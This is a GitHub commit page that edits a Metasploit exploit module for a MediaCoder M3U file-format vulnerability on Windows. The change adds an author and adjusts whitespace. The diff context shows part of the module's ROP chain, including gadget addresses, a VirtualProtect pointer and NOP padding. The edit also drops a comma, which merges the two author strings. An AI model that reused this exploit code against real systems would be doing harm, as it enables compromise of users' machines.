Skip to content

Commit 23d2bfc

Browse files
committed
add more author
1 parent b8354d3 commit 23d2bfc

File tree

1 file changed

+4
-3
lines changed

1 file changed

+4
-3
lines changed

modules/exploits/windows/fileformat/mediacoder_m3u.rb

Lines changed: 4 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -27,7 +27,8 @@ def initialize(info = {})
2727
'Author' =>
2828
[
2929
'metacom', # Vulnerability discovery and PoC
30-
'modpr0be <modpr0be[at]spentera.com>', # Metasploit module
30+
'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
31+
'otoy <otoy[at]spentera.com>' # Metasploit module
3132
],
3233
'References' =>
3334
[
@@ -85,7 +86,7 @@ def exploit
8586
junk,
8687
0x66d9d9ba, # NEG EAX # RETN
8788
0x6ab2241d, # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN
88-
junk(15), # reserve more junk for add esp,2c
89+
junk(15), # reserve more junk for add esp,2c
8990
0x1004a8ee, # POP ECX # RETN
9091
0x6ab561b0, # ptr to &VirtualProtect()
9192
0x66d9feee, # MOV EAX,DWORD PTR DS:[ECX] # RETN
@@ -104,7 +105,7 @@ def exploit
104105
0x100444e3, # POP EDI # RETN
105106
nops(true), # ROP NOP
106107
0x10048377, # POP EAX # POP EBP # RETN
107-
nops, # Regular NOPs
108+
nops, # Regular NOPs
108109
0x6ab01c06, # PUSH ESP# RETN
109110
0x6ab28dda, # PUSHAD # RETN
110111
].flatten.pack("V*")

0 commit comments

Comments
 (0)